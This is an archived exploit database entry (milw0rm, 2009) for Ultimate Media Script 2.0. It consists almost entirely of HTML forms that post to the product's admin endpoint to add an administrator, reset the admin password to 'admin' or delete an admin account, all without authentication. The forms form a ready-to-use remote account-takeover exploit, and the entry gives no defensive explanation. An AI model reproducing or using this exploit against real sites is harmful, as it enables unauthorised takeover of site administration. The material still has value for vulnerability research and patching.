Ultimate Media Script 2.0 - Remote Change Content

EDB-ID:

8795

CVE:

N/A




Platform:

PHP

Date:

2009-05-26


<tittle> Ultimate Media Script 2.0 Remote Change Password/Add Admin/Delete Admin Exploit</tittle>
 <FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
       <TD class=column1><INPUT class=ums_input name=username></TD>
       <TD class=column1><INPUT class=ums_input name=pass></TD>
       <TD class=column1 align=middle><INPUT type=image border=0 src="img/save.gif"></TD>
       <INPUT type=hidden value=add name=button>
      </FORM>
    </TR>
 
        <TR>
          <TD class=cat><b>Admin name:</b></TD>
          <TD class=cat><b>Password:</b></TD>
          <TD class=cat><b>Delete:</b></TD></TR>
 
        <FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
 
        <TR>
          <TD class=column2 width="33%"><INPUT class=ums_input value="admin" name=username_edit[1]></TD>
          <TD class=column2 width="33%"><INPUT class=ums_input type=password value="admin" name=pass_edit[1]></TD>
          <TD class=column2><A href="http://umscript.com/demo/admin/index.php?mod=admins&delete=1" onclick="return (quest())"><IMG border=0 alt=Delete src="img/delete.gif"></A></TD>
        </TR>
 
        <INPUT type=hidden value=modify name=do>
        <TR>
           </SPAN>
           <INPUT type=image border=0 src="img/save_all.gif">

# milw0rm.com [2009-05-26]